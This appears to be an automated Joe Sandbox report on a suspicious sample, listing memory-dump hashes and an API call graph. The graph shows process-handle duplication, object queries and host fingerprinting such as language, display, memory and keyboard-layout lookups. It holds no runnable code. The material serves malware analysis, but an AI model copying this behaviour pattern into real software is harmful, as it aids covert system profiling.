                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25a0ccbc02d4871947732af6b855c3c2acbcf4194892b2a7151cc29c72c110b9
                                                  • Instruction ID: ff558a8b2bb94a89f1182bd7e56fc71cbd5f2da297bf47084a80832c69b77eed
                                                  • Opcode Fuzzy Hash: 25a0ccbc02d4871947732af6b855c3c2acbcf4194892b2a7151cc29c72c110b9
                                                  • Instruction Fuzzy Hash: 28E04F2223E7B11BCE0B3279641126D3B558B8745478D00AFD00ADF7A3C949091783DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
                                                  • Instruction ID: 12eb2ac0ac4efa3295bdecc196f0ff1036f392a4d733dadc122193f827af28bb
                                                  • Opcode Fuzzy Hash: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
                                                  • Instruction Fuzzy Hash: 40E0E5353604148FC718DB2ED848D55B7EDEF89A2131640BAF209CB372DA62EC018B90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eecfc95eb9c55c65a3b769be670359880585259a1b4ec5e9dca99de176e6c279
                                                  • Instruction ID: 388bd38ad9c8ec3f2b20d40870ee01e2a84202498aa763ada558797af1a12e04
                                                  • Opcode Fuzzy Hash: eecfc95eb9c55c65a3b769be670359880585259a1b4ec5e9dca99de176e6c279
                                                  • Instruction Fuzzy Hash: FDE04F323505149B4B44AA5A98C882ABBAEFBCD66436940BDF50DC7351DE21EC0247A4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30d66bf7185cdbdc8059dc5285790179b6b5d572ca368002f95d703345f135e4
                                                  • Instruction ID: 48d05022603617643ce45506a5bc18cb250571624fcc13d4ce740754c0c51d46
                                                  • Opcode Fuzzy Hash: 30d66bf7185cdbdc8059dc5285790179b6b5d572ca368002f95d703345f135e4
                                                  • Instruction Fuzzy Hash: 66E0127361052CD78710DF5CF8854B6B3A9E745A65718816AE90CCF716F237D852C790
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09d0eca11df7659f756f3b160a76024459df67f685ad7ddf409f5ebc5f55cd26
                                                  • Instruction ID: c434527e84940d522debc494bc544815995e11cd079debdcb70da7aae25ed812
                                                  • Opcode Fuzzy Hash: 09d0eca11df7659f756f3b160a76024459df67f685ad7ddf409f5ebc5f55cd26
                                                  • Instruction Fuzzy Hash: 03E0D8353604510BCB289A1CE4109BD3797EFC862172D40BDE006C7766CA648C024740
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6cf5bb4f067b6a46fe6a6576d0782f8001d5427c20893684ec9842fa89e3e0b
                                                  • Instruction ID: 9443d059be47f3ff3ebac8befa91f3d4680501ec4bf9e6e940aae41c80d362eb
                                                  • Opcode Fuzzy Hash: e6cf5bb4f067b6a46fe6a6576d0782f8001d5427c20893684ec9842fa89e3e0b
                                                  • Instruction Fuzzy Hash: 82E04FB13042145BC3049B6ED894E16FBE9FBC9661B118179E10DCB361DEA1DC4486D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e938dea675222fb20c3694bcbba76415bad84ac57da3023fb9ffaf22e9496900
                                                  • Instruction ID: f475d334ebd9f9037fa39ebf0e472299f2cb85ddffe966a248dfce68d5ffc88a
                                                  • Opcode Fuzzy Hash: e938dea675222fb20c3694bcbba76415bad84ac57da3023fb9ffaf22e9496900
                                                  • Instruction Fuzzy Hash: 2DF082718146089ACF50EEB5E54519D3BF4DB26250B04C06EE448DE202EA74C045CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da655d6f73df62cd2d40986ca84e06fad165001081d19d83d3e5777ddec48e59
                                                  • Instruction ID: c7ccb0349f1f5e5cd8dcd0c1239f727ce4de07c8f56dcec5c6e983ef9239e948
                                                  • Opcode Fuzzy Hash: da655d6f73df62cd2d40986ca84e06fad165001081d19d83d3e5777ddec48e59
                                                  • Instruction Fuzzy Hash: B8F039707116118FEB24AB78D4117ABBBD6FB84346F0449BEA54ACB394EA3198008BA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00361f60e13a8fdf2c6f909c0fd07560221c6e9b258a2ce0fc09757bd7b4638f
                                                  • Instruction ID: d6b0d72e98b19cc1ffc4d187e74d5c45304d5513fc2cc3680214f4b684e8147b
                                                  • Opcode Fuzzy Hash: 00361f60e13a8fdf2c6f909c0fd07560221c6e9b258a2ce0fc09757bd7b4638f
                                                  • Instruction Fuzzy Hash: 4CE065B2700B149F86349F1DA44446BBBF6EBD5720704872EF086C7750C775A9068BE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 84377f05dd576f8029a223eabc6ef70f189d7182bee1eb887664ed752d2f31e7
                                                  • Instruction ID: 145b3bd3640d71cbba21d187c015740063f46de690d440efa717f91fc9f7818f
                                                  • Opcode Fuzzy Hash: 84377f05dd576f8029a223eabc6ef70f189d7182bee1eb887664ed752d2f31e7
                                                  • Instruction Fuzzy Hash: 98E0C2713102502FD705557D5C08A777A8ECBC26A1B04447DE604CB340DD51CC0243E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d689d4cd9b084007399b3b078d843e1d67d294e224d7b41add34a7cefd31d54
                                                  • Instruction ID: 1f14efc0b43eb893ee7b8011e09b0125ab309980f6df38cc9353a01b03e19776
                                                  • Opcode Fuzzy Hash: 5d689d4cd9b084007399b3b078d843e1d67d294e224d7b41add34a7cefd31d54
                                                  • Instruction Fuzzy Hash: 1CE0DFB63002105BC3049BAED890E26FBE9FFC8225B14857AE11CCB325DF61DC0483E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 040d87a94a771403e780e0614ee6cb51aa659c1c08f26379c6d12bf9d859c53b
                                                  • Instruction ID: 9de4269deb700680fcb2f417be2af06466a735447cd422bd065f43e65e0bad6b
                                                  • Opcode Fuzzy Hash: 040d87a94a771403e780e0614ee6cb51aa659c1c08f26379c6d12bf9d859c53b
                                                  • Instruction Fuzzy Hash: A9E092703116154FDB206B78D81076B77CAFB84246F0409BCA64DCB384EA31EC0047E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 473ff42c5cdd757a105132aca43a9ff5f89da10ccc28393b904d7c105ceb3b93
                                                  • Instruction ID: f4bc6277e4e56394272c805d61a031615fd20b4110f39374fd705d9c679c08f1
                                                  • Opcode Fuzzy Hash: 473ff42c5cdd757a105132aca43a9ff5f89da10ccc28393b904d7c105ceb3b93
                                                  • Instruction Fuzzy Hash: C5E0CD353705150BCB28551DE81497D339BDFCDA21B2D40B9E005C7766CD65CC024795
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15f0209f02589aae8d941ff0f413bf375f3ed084f0a38bd4b4161abacbaaa9e1
                                                  • Instruction ID: aa179eba6df7cb33f6558cea919bc6e36bbad1ef6595ae2f064b465b884ca4d7
                                                  • Opcode Fuzzy Hash: 15f0209f02589aae8d941ff0f413bf375f3ed084f0a38bd4b4161abacbaaa9e1
                                                  • Instruction Fuzzy Hash: 78E0D83121D3908FCB035BB054542253F69AF8210534940DDE141CF3A6C9159807CB61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa023ce22db7f28959919915b68108adc6ad39b4bc46a4f8460329474cbd181a
                                                  • Instruction ID: ee8cd1bc9108bb604c0a4b3de01ca37a89b2fd205ce8d68441b3d36193e27cab
                                                  • Opcode Fuzzy Hash: aa023ce22db7f28959919915b68108adc6ad39b4bc46a4f8460329474cbd181a
                                                  • Instruction Fuzzy Hash: 08E0C23130126017C614727D5418A6B658ECBC5AA4B00007EFA0ACB362DD52CC0183E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10bb9b888b5aca43e71f4568f228bc821efe56349e22bcfbfab02b84ec0f8db0
                                                  • Instruction ID: 65c12cf9a166c2a0947d8caea41d83053433645ee18e36400504ad2ae6b72d74
                                                  • Opcode Fuzzy Hash: 10bb9b888b5aca43e71f4568f228bc821efe56349e22bcfbfab02b84ec0f8db0
                                                  • Instruction Fuzzy Hash: DCE046313842609FC70A8F68D498C957FE8EF4A22030241AAE90ACB331CBB1DC02CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be2eb184f6d744d0a642c2d3558665d465bf98ebc12be7ebfbec4e3545e1f0b1
                                                  • Instruction ID: a0f9f78f27359a1c7748e374f9be0ccd88869aae14a0c88b7bffa2d404c480a0
                                                  • Opcode Fuzzy Hash: be2eb184f6d744d0a642c2d3558665d465bf98ebc12be7ebfbec4e3545e1f0b1
                                                  • Instruction Fuzzy Hash: 2FD0A7667102942BD600A5BE5C08E7B7ACEC7C6AA2B04447DFB09CB340DD51CC0143E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0fa5e79cf900c6a05e7b71941b1236ba5ac61009e7b74fd5891754fff93454c4
                                                  • Instruction ID: eaef3481b506a7fe8450ca327f1e9a4dc2fa070c214e53c189ed95ee39b2c459
                                                  • Opcode Fuzzy Hash: 0fa5e79cf900c6a05e7b71941b1236ba5ac61009e7b74fd5891754fff93454c4
                                                  • Instruction Fuzzy Hash: F4900217790528010811319DB00019E530985C0C76190D077D64DC45044915959B4696
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 757676bf54d2acb39ab08b61092dcab20279c46535671de318fae1755b14184c
                                                  • Instruction ID: f8862b7b1460fb3e7ce5eeb40336516da56f1dcb7b63e23b8ae4b5da1b66cb2d
                                                  • Opcode Fuzzy Hash: 757676bf54d2acb39ab08b61092dcab20279c46535671de318fae1755b14184c
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Huq$Huq$Huq$Huq$Huq
                                                  • API String ID: 0-117896378
                                                  • Opcode ID: aa0d7655b9af1556726ff29c6fb67f7436ba0dd2eb711407b3d28bd8972053ef
                                                  • Instruction ID: 5e938ecbb6059b527d25ec4bc3f58c951f1a097a95facec85d83e74bd0e70e52
                                                  • Opcode Fuzzy Hash: aa0d7655b9af1556726ff29c6fb67f7436ba0dd2eb711407b3d28bd8972053ef
                                                  • Instruction Fuzzy Hash: 50323274F002588FDB64DF68C4947AEBBF2AF84300F1485A9D449AB395EB34AD45CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40b77534b5c39a4a76015d33200aea18ca1c94d04cb2c2a8858afb70f0b2a15c
                                                  • Instruction ID: f0d1febdaecfc52d9c32034cbd09b24d6ab15ce86b38b859adc2dec400be08f9
                                                  • Opcode Fuzzy Hash: 40b77534b5c39a4a76015d33200aea18ca1c94d04cb2c2a8858afb70f0b2a15c
                                                  • Instruction Fuzzy Hash: DE1272B04097468EE724CF65ED5C18A7BB1FB85B2CB504A0DD2A12F2E2DBBC155ACF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c8a93743b7725598bddf36f84330443db04eaaa040b5a2a3f7e252a438e7fbb
                                                  • Instruction ID: df73ae61e1ebcbfb8758ee8322b46c684b3eabcfef9b3ff65717636c6f76ce0b
                                                  • Opcode Fuzzy Hash: 3c8a93743b7725598bddf36f84330443db04eaaa040b5a2a3f7e252a438e7fbb
                                                  • Instruction Fuzzy Hash: 7BC11A71E002589FCB25DF65C880B99FBF2BF84310F14C5AAD449AB295E734E985CF61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c04e17039baba9bc735023f315af20ab8fadfa2cd305c0a4c12c2052d1caccb
                                                  • Instruction ID: f0fac4ec2be78d3f4f687de9e52c490575bc23145b25fe265d6b2e7520228cc2
                                                  • Opcode Fuzzy Hash: 0c04e17039baba9bc735023f315af20ab8fadfa2cd305c0a4c12c2052d1caccb
                                                  • Instruction Fuzzy Hash: 1AD1FB3191075A8ACB10EB64D994AADF7B1FFD5300F10CB9AE50977250EB70AAC9CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e2ef3f7ca4b1206887be0e1fceb5556d22e952314c7ed91718b0874d2623c0b
                                                  • Instruction ID: 33ee6c721583e576937b08436cdf6060b5ee8860c18e9e4e0dbbba4105ca4c7b
                                                  • Opcode Fuzzy Hash: 0e2ef3f7ca4b1206887be0e1fceb5556d22e952314c7ed91718b0874d2623c0b
                                                  • Instruction Fuzzy Hash: C9D1EA3191076A8ACB10EB64D994A9DF7B1FFD5300F10CB9AE50977250EB70AAC9CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 067c92f468ec69d2b626f52e35ba412cc17925e37ff835148c003412dc02057b
                                                  • Instruction ID: 1b83e59741058d136690b65647655cbd7e12a5e1a1e48dcda98433581aac8ad8
                                                  • Opcode Fuzzy Hash: 067c92f468ec69d2b626f52e35ba412cc17925e37ff835148c003412dc02057b
                                                  • Instruction Fuzzy Hash: C2A14D36A002198FCF15DFA4C84459EB7B2FF85300B15856DE80AEB365DB75E949CF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5162f1f24d86acca33bca75badd7b2f671e40c30af503a5ca3a3477ba0ffe23a
                                                  • Instruction ID: edd9b396b36c6ac1e3be5fa04894416fc0c4da4d6db4039715beec63f76f58ed
                                                  • Opcode Fuzzy Hash: 5162f1f24d86acca33bca75badd7b2f671e40c30af503a5ca3a3477ba0ffe23a
                                                  • Instruction Fuzzy Hash: FCC1E3B08057468ED725CF64EC5818A7BB1FB85B28F504B1DD2A16F2E2DBBC158ACF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6971ca33b96b776028f1d6c3d826d03be8633702e9764c766066472ef6cfcf55
                                                  • Instruction ID: 57e5ecc0883ea9592d9fd266552e99482d9da2d21601d560ed189ff112640b70
                                                  • Opcode Fuzzy Hash: 6971ca33b96b776028f1d6c3d826d03be8633702e9764c766066472ef6cfcf55
                                                  • Instruction Fuzzy Hash: D0819272D00609CACB14DFA9D8442EEFBB2FF84340F25C139D455EB659EB39965ACB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed3a87ca8df321a87255f4788780cf49f9a33889c071642d658993704e5116ae
                                                  • Instruction ID: f2d525fbdc12cc84b60080e423873463b2f0b551bd47e5fea4b144a3806185bf
                                                  • Opcode Fuzzy Hash: ed3a87ca8df321a87255f4788780cf49f9a33889c071642d658993704e5116ae
                                                  • Instruction Fuzzy Hash: BF81AC72D00609CBCB10DFA9D8442EEFBB2FF84300F19C13AD455AB698EB399656CB41

                                                  Execution Graph

                                                  Execution Coverage:19.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:14.7%
                                                  Total number of Nodes:381
                                                  Total number of Limit Nodes:12
2877->2875 2879 2c153a GetCurrentProcess DuplicateHandle 2877->2879 2878->2541 2880 2c156f 2879->2880 2881 2c15eb FindCloseChangeNotification 2879->2881 2880->2881 2882 2c157b GetFileType 2880->2882 2881->2874 2882->2881 2883 2c158a 2882->2883 2909 2c1610 2883->2909 2885 2c1593 2885->2881 2886 2c159a CloseHandle GetCurrentProcess DuplicateHandle 2885->2886 2886->2881 2887 2c15d2 2886->2887 2887->2881 2888 2c15d8 CloseHandle 2887->2888 2888->2881 2889->2543 2891 2c31c5 2890->2891 2913 2c8d00 GetUserDefaultUILanguage 2891->2913 2893 2c3233 2914 2c8c00 EnumDisplayDevicesA 2893->2914 2895 2c324b 2896 2c8b90 GetCurrentHwProfileA 2895->2896 2897 2c3259 2896->2897 2916 2c8cc0 GetPhysicallyInstalledSystemMemory 2897->2916 2899 2c3265 2918 2c8ca0 GetSystemInfo 2899->2918 2901 2c3271 2919 2c8c50 GetKeyboardLayoutList 2901->2919 2903 2c327d 2920 2c8c70 KiUserCallbackDispatcher GetSystemMetrics 2903->2920 2905 2c3289 2921 2c8d20 GetModuleFileNameW 2905->2921 2907 2c3295 2907->2547 2908->2871 2910 2c161d 2909->2910 2911 2c1656 NtQueryObject NtQueryObject 2910->2911 2912 2c1693 2911->2912 2912->2885 2913->2893 2915 2c8c2a 2914->2915 2915->2895 2917 2c8cd4 __aulldiv 2916->2917 2917->2899 2918->2901 2919->2903 2920->2905 2921->2907 2922->2552 2924 2c29ec 2923->2924 2925 2c2a25 2924->2925 2926 2c2a17 TerminateThread 2924->2926 2927 2c2a3d 2925->2927 2928 2c2a2e TerminateThread 2925->2928 2926->2925 2927->2559 2928->2927 2930 2c43e0 3 API calls 2929->2930 2931 2c1c94 2930->2931 2932 2c1e80 HeapDestroy 2931->2932 2932->2563 2933 2c25e3 2935 2c25eb 2933->2935 2934 2c260d 2935->2934 2936 2c2629 2935->2936 2937 2c26ba 2935->2937 2956 2c1ea0 RtlAllocateHeap 2936->2956 2939 2c26cc 2937->2939 2940 2c275d 2937->2940 2957 2c1ea0 RtlAllocateHeap 2939->2957 2953 2c2692 2940->2953 2958 2c1ea0 RtlAllocateHeap 2940->2958 2943 2c26eb 2947 2c12f0 12 API calls 2943->2947 2944 2c278e 2951 2c1000 7 API calls 2944->2951 2945 2c2648 2946 2c1060 12 API calls 2945->2946 2948 2c2686 2946->2948 2949 2c2729 
2947->2949 2950 2c1ee0 RtlFreeHeap 2948->2950 2952 2c1ee0 RtlFreeHeap 2949->2952 2950->2953 2954 2c27cc 2951->2954 2952->2953 2955 2c1ee0 RtlFreeHeap 2954->2955 2955->2953 2956->2945 2957->2943 2958->2944

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 002C1EA0: RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 002C14A9
                                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 002C1523
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 002C154B
                                                  • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 002C1565
                                                  • GetFileType.KERNELBASE(000000FF), ref: 002C157F
                                                  • CloseHandle.KERNEL32(000000FF), ref: 002C159E
                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 002C15AE
                                                  • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 002C15C8
                                                  • CloseHandle.KERNEL32(000000FF), ref: 002C15DC
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 002C15EF
                                                    • Part of subcall function 002C1EE0: RtlFreeHeap.NTDLL(030F0000,00000000,00000000,02E80000), ref: 002C1EFE
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
                                                  • String ID:
                                                  • API String ID: 2769610337-0
                                                  • Opcode ID: ed180b1ff0556b8e54712d096241b252c63e9645cacef9540c195ee1c49333be
                                                  • Instruction ID: c9751bf11fe766c7acf640a8510233b4abf809b20d5c80f890c746b736e1c6d8
                                                  • Opcode Fuzzy Hash: ed180b1ff0556b8e54712d096241b252c63e9645cacef9540c195ee1c49333be
                                                  • Instruction Fuzzy Hash: 17515FB4D10209EFDB24CFD8D889FAEB7B5BF49345F10425CE612A7281C7749A61CB61

                                                  Control-flow Graph

